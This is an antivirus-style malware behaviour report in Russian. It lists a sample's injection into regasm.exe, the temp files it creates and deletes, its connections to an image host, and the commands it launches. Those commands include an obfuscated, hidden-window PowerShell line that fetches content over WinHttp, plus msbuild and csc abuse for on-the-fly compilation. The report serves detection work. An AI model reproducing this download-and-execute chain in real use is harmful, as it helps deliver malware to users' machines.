Техническая информация
Вредоносные функции
Внедряет код в
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\xdvgtynvlnsuikpnkahkluqsikjhmeqwpnbgdstyqopnhjegzwwbxkgdmdyjofihxwfujjjshjuwe.zip
- %HOMEPATH%\uniplat.lnk
- %TEMP%\j2ouhfjz.0.cs
- %TEMP%\j2ouhfjz.cmdline
- %TEMP%\j2ouhfjz.out
- %TEMP%\csc7474.tmp
- %TEMP%\res74c3.tmp
- %TEMP%\j2ouhfjz.dll
Удаляет следующие файлы
- %TEMP%\res74c3.tmp
- %TEMP%\csc7474.tmp
- %TEMP%\j2ouhfjz.out
- %TEMP%\j2ouhfjz.pdb
- %TEMP%\j2ouhfjz.dll
- %TEMP%\j2ouhfjz.0.cs
- %TEMP%\j2ouhfjz.cmdline
- %HOMEPATH%\uniplat.lnk
Сетевая активность
Подключается к
- 'i.##gur.com':443
TCP
Другие
- 'i.##gur.com':443
UDP
- DNS ASK i.##gur.com
Другое
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $YUWDogusXBzvARancElkIrKKRtHeeZfPVNPcfCZMirTjmYuVhhZTWSGG=New-Object -c WinHttp.'WinHttpRequest'.'5'.'1';$YUWDogusXBzvARancElkIrKKRtHeeZfPVNPcfCZMirTjmYuVhhZTWSGG.'open'('GET','https://i.imgur.... (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\msbuild.exe' "%HOMEPATH%\uniplat.lnk" (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\j2ouhfjz.cmdline" (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES74C3.tmp" "%TEMP%\CSC7474.tmp" (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'
